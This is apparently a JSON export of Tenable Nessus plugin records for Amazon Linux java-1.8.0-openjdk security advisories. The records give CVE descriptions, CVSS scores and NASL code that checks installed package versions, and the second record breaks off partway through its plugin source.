"p-cpe:/a:amazon:linux:java-1.8.0-openjdk", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1460.NASL", "href": "https://www.tenable.com/plugins/nessus/145003", "sourceData": "##\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1460.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145003);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1460\");\n\n script_name(english:\"Amazon Linux AMI : java-1.8.0-openjdk (ALAS-2021-1460)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of java-1.8.0-openjdk installed on the remote host is prior to 1.8.0.272.b10-1.56. It is, therefore,\naffected by multiple vulnerabilities as referenced in the ALAS-2021-1460 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. 
CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. 
CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. 
Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1460.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14803\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update java-1.8.0-openjdk' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/14\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1', 
'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1', 'cpu':'i686', 'release':'ALA'},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1', 'cpu':'x86_64', 'release':'ALA'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk / java-1.8.0-openjdk-debuginfo / java-1.8.0-openjdk-demo / etc\");\n}", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-08T17:17:06", "description": "The version of tested product installed on the remote host is prior to tested version. 
It is, therefore, affected by\nmultiple vulnerabilities as referenced in the ALAS2-2021-1579 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. 
CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. 
This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. 
Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-07T00:00:00", "title": "Amazon Linux 2 : java-1.8.0-openjdk (ALAS-2021-1579)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-07T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-devel", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-accessibility-debug", 
"p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless-debug", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-src", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-debuginfo", "p-cpe:/a:amazon:linux:java-1.8.0-openjdk-demo"], "id": "AL2_ALAS-2021-1579.NASL", "href": "https://www.tenable.com/plugins/nessus/144805", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1579.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144805);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/07\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1579\");\n\n script_name(english:\"Amazon Linux 2 : java-1.8.0-openjdk (ALAS-2021-1579)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the ALAS2-2021-1579 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. 
Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. 
Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). 
CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. 
This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1579.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14779\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14781\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14792\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14796\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14803\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update java-1.8.0-openjdk' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n 
